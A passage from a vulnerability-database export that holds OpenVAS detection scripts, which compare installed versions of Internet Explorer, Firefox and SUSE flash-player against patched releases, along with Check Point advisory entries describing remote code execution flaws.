script_oid(\"1.3.6.1.4.1.25623.1.0.805720\");\n script_version(\"2020-06-09T05:48:43+0000\");\n script_cve_id(\"CVE-2015-1729\", \"CVE-2015-1733\", \"CVE-2015-1767\", \"CVE-2015-2372\",\n \"CVE-2015-2383\", \"CVE-2015-2384\", \"CVE-2015-2385\", \"CVE-2015-2389\",\n \"CVE-2015-2390\", \"CVE-2015-2391\", \"CVE-2015-2397\", \"CVE-2015-2398\",\n \"CVE-2015-2401\", \"CVE-2015-2402\", \"CVE-2015-2403\", \"CVE-2015-2404\",\n \"CVE-2015-2388\", \"CVE-2015-2406\", \"CVE-2015-2408\", \"CVE-2015-2410\",\n \"CVE-2015-2411\", \"CVE-2015-2412\", \"CVE-2015-2413\", \"CVE-2015-2414\",\n \"CVE-2015-2419\", \"CVE-2015-2421\", \"CVE-2015-2422\", \"CVE-2015-2425\",\n \"CVE-2015-1738\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 05:48:43 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-15 12:14:36 +0530 (Wed, 15 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (3076321)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS15-065.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to improper\n handling memory objects when accessing it and does not properly validate\n permissions under specific conditions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to corrupt memory and potentially execute arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x/10.x/11.x and VBScript 5.8 on 8.x/9.x/10.x/11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3065822\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS15-065\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3, winVista:3, win7:2, win7x64:2,\n win2008:3, win2008r2:2, win8:1, win8x64:1, win2012:1,\n win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^([6-9|1[01])\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003:3, win2003x64:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5662\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.21480\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23706\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.19420\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.23000\", test_version2:\"7.0.6002.23727\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19651\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23706\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16668\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20783\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7601.17000\", test_version2:\"8.0.7601.18895\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.22000\", test_version2:\"8.0.7601.23098\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16668\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20783\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.17411\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.21000\", test_version2:\"10.0.9200.21522\")||\n version_in_range(version:dllVer, test_version:\"11.0.9600.00000\", test_version2:\"11.0.9600.17914\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8:1, win2012:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.17411\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.20000\", test_version2:\"10.0.9200.21522\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"11.0.9600.17905\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:04:39", "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5451", "CVE-2017-5462", "CVE-2017-5436", "CVE-2016-1019", "CVE-2017-5441", "CVE-2017-5442", "CVE-2017-5446", "CVE-2017-5434", "CVE-2017-5465", "CVE-2016-6354", "CVE-2017-5429", "CVE-2017-5440", "CVE-2017-5458", "CVE-2017-5435", "CVE-2017-5432", "CVE-2017-5469", "CVE-2017-5455", "CVE-2017-5438", "CVE-2017-5439", "CVE-2017-5445", "CVE-2017-5450", "CVE-2017-5433", "CVE-2017-5447", "CVE-2017-5466", "CVE-2017-5444", "CVE-2017-5467", "CVE-2017-5460", "CVE-2017-5449", "CVE-2017-5454", "CVE-2017-5461", "CVE-2017-5437", "CVE-2017-5456", "CVE-2017-5453", "CVE-2017-5468", "CVE-2017-5430", "CVE-2017-5463", "CVE-2017-5452", "CVE-2017-5448", "CVE-2017-5459", "CVE-2017-5443", "CVE-2017-5464"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310810752", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810752", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-MAC OS X\n#\n# Authors:\n# kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810752\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2017-5433\", \"CVE-2017-5435\", \"CVE-2017-5436\", \"CVE-2017-5461\",\n\"CVE-2017-5459\", \"CVE-2017-5466\", \"CVE-2017-5434\", \"CVE-2017-5432\",\n\"CVE-2017-5460\", \"CVE-2017-5438\", \"CVE-2017-5439\", \"CVE-2017-5440\",\n\"CVE-2017-5441\", \"CVE-2017-5442\", \"CVE-2017-5464\", \"CVE-2017-5443\",\n\"CVE-2017-5444\", \"CVE-2017-5446\", \"CVE-2017-5447\", \"CVE-2017-5465\",\n\"CVE-2017-5448\", \"CVE-2017-5437\", \"CVE-2016-1019\", \"CVE-2017-5454\",\n\"CVE-2017-5455\", \"CVE-2017-5456\", \"CVE-2017-5469\", \"CVE-2016-6354\",\n\"CVE-2017-5445\", \"CVE-2017-5449\", \"CVE-2017-5450\", \"CVE-2017-5451\",\n\"CVE-2017-5462\", \"CVE-2017-5463\", \"CVE-2017-5467\", \"CVE-2017-5452\",\n\"CVE-2017-5453\", \"CVE-2017-5458\", \"CVE-2017-5468\", \"CVE-2017-5430\",\n\"CVE-2017-5429\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 10:53:42 +0530 (Thu, 20 Apr 2017)\");\n script_name(\"Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - An use-after-free in SMIL animation functions,\n\n - An use-after-free during transaction processing in the editor,\n\n - An uut-of-bounds write with malicious font in Graphite 2,\n\n - An Out-of-bounds write in Base64 encoding in NSS,\n\n - The buffer overflow in WebGL,\n\n - The origin confusion when reloading isolated data:text/html URL,\n\n - An use-after-free during focus handling,\n\n - An use-after-free in text input selection,\n\n - An use-after-free in frame selection,\n\n - An use-after-free in nsAutoPtr during XSLT processing,\n\n - An use-after-free in nsTArray Length() during XSLT processing,\n\n - An use-after-free in txExecutionState destructor during XSLT processing,\n\n - An use-after-free with selection during scroll events,\n\n - An use-after-free during style changes,\n\n - The memory corruption with accessibility and DOM manipulation,\n\n - The out-of-bounds write during BinHex decoding,\n\n - The buffer overflow while parsing application/http-index-format content,\n\n - An out-of-bounds read when HTTP/2 DATA frames are sent with incorrect data,\n\n - An out-of-bounds read during glyph processing,\n\n - An out-of-bounds read in ConvolvePixel,\n\n - An out-of-bounds write in ClearKeyDecryptor,\n\n - The vulnerabilities in Libevent library,\n\n - The sandbox escape allowing file system read access through file picker,\n\n - The sandbox escape through internal feed reader APIs,\n\n - The sandbox escape allowing local file system access,\n\n - The Potential Buffer overflow in flex-generated code,\n\n - An uninitialized values used while parsing application/http-index-format content,\n\n - The crash during bidirectional unicode manipulation with animation,\n\n - An addressbar spoofing using javascript: URI on Firefox for Android,\n\n - An addressbar spoofing with onblur event,\n\n - The DRBG flaw in NSS,\n\n - The memory corruption when drawing Skia content,\n\n - The addressbar spoofing during scrolling with editable content on Firefox for Android,\n\n - The HTML injection into RSS Reader feed preview page through TITLE element,\n\n - The drag and drop of javascript: URLs can allow for self-XSS,\n\n - An incorrect ownership model for Private Browsing information and\n\n - The memory safety bugs fixed in Firefox 53 and Firefox ESR 52.1.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code, to delete arbitrary files by leveraging\n certain local file execution, to obtain sensitive information, and to cause\n a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before\n 53.0 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 53.0\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-10/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"53.0\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"53.0\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:08:00", "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5451", "CVE-2017-5462", "CVE-2017-5436", "CVE-2016-1019", "CVE-2017-5441", "CVE-2017-5442", "CVE-2017-5446", "CVE-2017-5434", "CVE-2017-5465", "CVE-2016-6354", "CVE-2017-5429", "CVE-2017-5440", "CVE-2017-5458", "CVE-2017-5435", "CVE-2017-5432", "CVE-2017-5469", "CVE-2017-5455", "CVE-2017-5438", "CVE-2017-5439", "CVE-2017-5445", "CVE-2017-5450", "CVE-2017-5433", "CVE-2017-5447", "CVE-2017-5466", "CVE-2017-5444", "CVE-2017-5467", "CVE-2017-5460", "CVE-2017-5449", "CVE-2017-5454", "CVE-2017-5461", "CVE-2017-5437", "CVE-2017-5456", "CVE-2017-5453", "CVE-2017-5468", "CVE-2017-5430", "CVE-2017-5463", "CVE-2017-5452", "CVE-2017-5448", "CVE-2017-5459", "CVE-2017-5443", "CVE-2017-5464"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310810751", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810751", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-Windows\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810751\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2017-5433\", \"CVE-2017-5435\", \"CVE-2017-5436\", \"CVE-2017-5461\",\n \"CVE-2017-5459\", \"CVE-2017-5466\", \"CVE-2017-5434\", \"CVE-2017-5432\",\n \"CVE-2017-5460\", \"CVE-2017-5438\", \"CVE-2017-5439\", \"CVE-2017-5440\",\n \"CVE-2017-5441\", \"CVE-2017-5442\", \"CVE-2017-5464\", \"CVE-2017-5443\",\n \"CVE-2017-5444\", \"CVE-2017-5446\", \"CVE-2017-5447\", \"CVE-2017-5465\",\n \"CVE-2017-5448\", \"CVE-2017-5437\", \"CVE-2016-1019\", \"CVE-2017-5454\",\n \"CVE-2017-5455\", \"CVE-2017-5456\", \"CVE-2017-5469\", \"CVE-2016-6354\",\n \"CVE-2017-5445\", \"CVE-2017-5449\", \"CVE-2017-5450\", \"CVE-2017-5451\",\n \"CVE-2017-5462\", \"CVE-2017-5463\", \"CVE-2017-5467\", \"CVE-2017-5452\",\n \"CVE-2017-5453\", \"CVE-2017-5458\", \"CVE-2017-5468\", \"CVE-2017-5430\",\n \"CVE-2017-5429\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 10:53:01 +0530 (Thu, 20 Apr 2017)\");\n script_name(\"Mozilla Firefox Security Updates(mfsa_2017-10_2017-12)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - An use-after-free in SMIL animation functions,\n\n - An use-after-free during transaction processing in the editor,\n\n - An uut-of-bounds write with malicious font in Graphite 2,\n\n - An Out-of-bounds write in Base64 encoding in NSS,\n\n - The buffer overflow in WebGL,\n\n - The origin confusion when reloading isolated data:text/html URL,\n\n - An use-after-free during focus handling,\n\n - An use-after-free in text input selection,\n\n - An use-after-free in frame selection,\n\n - An use-after-free in nsAutoPtr during XSLT processing,\n\n - An use-after-free in nsTArray Length() during XSLT processing,\n\n - An use-after-free in txExecutionState destructor during XSLT processing,\n\n - An use-after-free with selection during scroll events,\n\n - An use-after-free during style changes,\n\n - The memory corruption with accessibility and DOM manipulation,\n\n - The out-of-bounds write during BinHex decoding,\n\n - The buffer overflow while parsing application/http-index-format content,\n\n - An out-of-bounds read when HTTP/2 DATA frames are sent with incorrect data,\n\n - An out-of-bounds read during glyph processing,\n\n - An out-of-bounds read in ConvolvePixel,\n\n - An out-of-bounds write in ClearKeyDecryptor,\n\n - The vulnerabilities in Libevent library,\n\n - The sandbox escape allowing file system read access through file picker,\n\n - The sandbox escape through internal feed reader APIs,\n\n - The sandbox escape allowing local file system access,\n\n - The Potential Buffer overflow in flex-generated code,\n\n - An uninitialized values used while parsing application/http-index-format content,\n\n - The crash during bidirectional unicode manipulation with animation,\n\n - An addressbar spoofing using javascript: URI on Firefox for Android,\n\n - An addressbar spoofing with onblur event,\n\n - The DRBG flaw in NSS,\n\n - The memory corruption when drawing Skia content,\n\n - The addressbar spoofing during scrolling with editable content on Firefox for Android,\n\n - The HTML injection into RSS Reader feed preview page through TITLE element,\n\n - The drag and drop of javascript: URLs can allow for self-XSS,\n\n - An incorrect ownership model for Private Browsing information and\n\n - The memory safety bugs fixed in Firefox 53 and Firefox ESR 52.1.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code, to delete arbitrary files by leveraging\n certain local file execution, to obtain sensitive information, and to cause\n a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before 53.0 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 53.0\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-10\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"53.0\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"53.0\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-17T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2016:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1102", "CVE-2016-1026", "CVE-2016-1098", "CVE-2016-1021", "CVE-2016-4108", "CVE-2016-1019", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-4116", "CVE-2016-1006", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-1023", "CVE-2016-4113", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-4112", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1106", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-1025", "CVE-2016-4115", "CVE-2016-1016", "CVE-2016-1105", "CVE-2016-1099", "CVE-2016-1015"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851312", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851312\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-17 13:40:35 +0200 (Tue, 17 May 2016)\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\",\n \"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2016:1305-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.621 (bsc#979422):\n\n * APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102,\n CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110,\n CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got\n published afterwards:\n\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1305-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.621~130.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.621~130.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:44", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in Adobe Flash Player while handling a specially crafted SWF file. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-06T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Remote Code Execution (APSA16-01: CVE-2016-1019)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019"], "modified": "2017-10-03T00:00:00", "id": "CPAI-2016-0264", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:44:29", "description": "A remote code execution vulnerability exists in the way that the JScript engine, when rendered in Internet Explorer, handles objects in memory. A remote 